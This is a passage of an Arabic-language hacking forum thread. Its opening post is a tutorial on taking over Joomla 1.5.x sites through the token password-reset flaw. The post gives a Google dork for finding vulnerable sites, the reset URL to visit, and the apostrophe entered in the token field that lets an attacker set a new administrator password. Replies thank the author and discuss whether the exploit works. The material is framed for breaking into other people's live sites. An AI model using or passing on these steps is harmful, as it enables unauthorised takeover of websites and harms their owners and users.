استغلال ثغرة سكربت جومله ===****** Joomla

استغلال ثغرة سكربت جومله ===****** Joomla


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 12

الموضوع: استغلال ثغرة سكربت جومله ===****** Joomla

  1. #1
    هكر متميز الصورة الرمزية ahmedfreed
    تاريخ التسجيل
    Nov 2012
    الدولة
    iraq
    المشاركات
    1,795

    افتراضي استغلال ثغرة سكربت جومله ===****** Joomla

    اقدم لكم وبين ايديكم شرح استغلال ثغره سكربت جومله
    ****** Joomla===========


    Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability

    الأصدارات المصابة 1.5.x


    نوع الثغرة Remote Admin Change Password تغيير باسوورد الأدمن


    هسه ندخل على التطبيق ولبحث

    الدورك البحث
    تدخل تفتح الكوكل صديقنا Google

    وتكدب هاذا الكود الي هوه الدورك

    كود PHP:
    inurl:index.php?option=com_use
    طلعتنه هوايه مواقع مصابه
    تختار احد من هن

    هسه تشوف طريقه الاستغلال الثغره بعد مالكينه الموقع المصاب


    ندخل للموقع المصاب ونضيف هاذا المسار

    كود PHP:
    index.php?option=com_user&view=reset&layout=confir m
    يصير هيجي يعني

    كود PHP:
    http://www.XXXXXX.com/index.php?opti...layout=confirm
    راح يطلع مربع اسمة "token

    نخلي بل مربع هاذي العلامه النقطه

    '

    هسه راج يطلب منك باسورد جديد

    تكتب الباسورد الي تريده

    وتعيد كتابته مره لخ

    ومبرووك الاختراقق

    خوما صعبه ااذا صعبه كلولي

    نلقاكم بدرس اخررر
    معهد شموخ العرب

    لتطوير وبرمجة المنتديات



  2. #2
    :: مراقب عام :: الصورة الرمزية shhaby
    تاريخ التسجيل
    Nov 2012
    المشاركات
    3,233

    افتراضي رد: استغلال ثغرة سكربت جومله ===****** Joomla

    بارك الله فيك يا مبدع . بالتوفيق

    لا اله الا الله محمد رسول الله




  3. #3
    هكر متميز الصورة الرمزية ahmedfreed
    تاريخ التسجيل
    Nov 2012
    الدولة
    iraq
    المشاركات
    1,795

    افتراضي رد: استغلال ثغرة سكربت جومله ===****** Joomla

    مشكور حبي عالمرور
    معهد شموخ العرب

    لتطوير وبرمجة المنتديات



  4. #4
    هكر مجتهد
    تاريخ التسجيل
    Nov 2012
    المشاركات
    248

    افتراضي رد: استغلال ثغرة سكربت جومله ===****** Joomla

    يسلمووو

  5. #5
    هكر متميز الصورة الرمزية ahmedfreed
    تاريخ التسجيل
    Nov 2012
    الدولة
    iraq
    المشاركات
    1,795

    افتراضي رد: استغلال ثغرة سكربت جومله ===****** Joomla

    مشكور اخوان على الردود
    معهد شموخ العرب

    لتطوير وبرمجة المنتديات



  6. #6
    محظور
    تاريخ التسجيل
    Jan 2012
    الدولة
    الجزائر.فلسطين
    المشاركات
    1,490

    افتراضي رد: استغلال ثغرة سكربت جومله ===****** Joomla

    مشكور حبيبي بس شغلة لما تحط ' تضغط على submit ???

  7. #7
    هكر متميز الصورة الرمزية hackerpk
    تاريخ التسجيل
    Jan 2013
    الدولة
    مغربي في اسبانيا
    المشاركات
    1,165

    افتراضي رد: استغلال ثغرة سكربت جومله ===****** Joomla

    بارك الله فيك

  8. #8
    هكر مبتديء
    تاريخ التسجيل
    Mar 2013
    المشاركات
    1

    افتراضي رد: استغلال ثغرة سكربت جومله ===****** Joomla

    جربتها اخى ولكن ما ظبطت معى على اكثر من موقع ويقول لى ان الرمز التأكيدى خطأ ولدى سؤال هل فى خانة اليوزر اكتب admin ‎‏ ولا اتركها فارغة وهل اكتب فى token‏ هذه النقطة . ام هذه ' وياريت يا اخى تقولى ليه مش عايزه تظبط معى وايه الاخطاء المحتملة؟

  9. #9
    هكر متميز الصورة الرمزية dark prince
    تاريخ التسجيل
    Jul 2010
    الدولة
    IN DARKNESS
    المشاركات
    1,608

    افتراضي رد: استغلال ثغرة سكربت جومله ===****** Joomla

    مكشور حبيب اخي
    بس الثغرة نسب النجاح فيا شوية ضئيلة
    لـن نرحم الضعفاء حتى يصبحوا اقوياء واذا اصبحوا اقوياء فلن تجوز الرحمة عليهم

    اذا مدت يدك لتمسني سأرفع قبعتي احتراماً لشجاعتك ولكن تأكد اني لن أنزلها إلا على قبرك


    يوجد ايميلات ثلاثية للمبادلة



  10. #10
    هكر متميز الصورة الرمزية ahmedfreed
    تاريخ التسجيل
    Nov 2012
    الدولة
    iraq
    المشاركات
    1,795

    افتراضي رد: استغلال ثغرة سكربت جومله ===****** Joomla

    اه بالنسبه لها قليله وكثير مواقع رقعتها ولكن في كم موقع عالعموم تضعون في الخانة ' اذا منجحت مرقعه
    معهد شموخ العرب

    لتطوير وبرمجة المنتديات



صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. شرح ثغرة SQL Injection بسيكربت Joomla (بالشرح الممل)
    بواسطة ahmedfreed في المنتدى قسم الثغرات
    مشاركات: 18
    آخر مشاركة: 04-15-2013, 01:49 AM
  2. ثغرة. Joomla com_collector Component Arbitrary File Upload Vulnerability
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 01-21-2013, 04:18 PM
  3. |ألدرس الثاني والعشرون| كيفية رفع شل من سكربت جوملا Joomla
    بواسطة QtRoNiX FoX في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 11
    آخر مشاركة: 09-21-2012, 06:57 PM
  4. استغلال ثغرة الاهدائات
    بواسطة HuNtEr2 في المنتدى قسم الثغرات
    مشاركات: 21
    آخر مشاركة: 11-10-2010, 02:44 AM
  5. سؤال في مسار ملف config في سكربت joomla
    بواسطة HaKiMCoM في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 2
    آخر مشاركة: 01-17-2010, 07:49 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •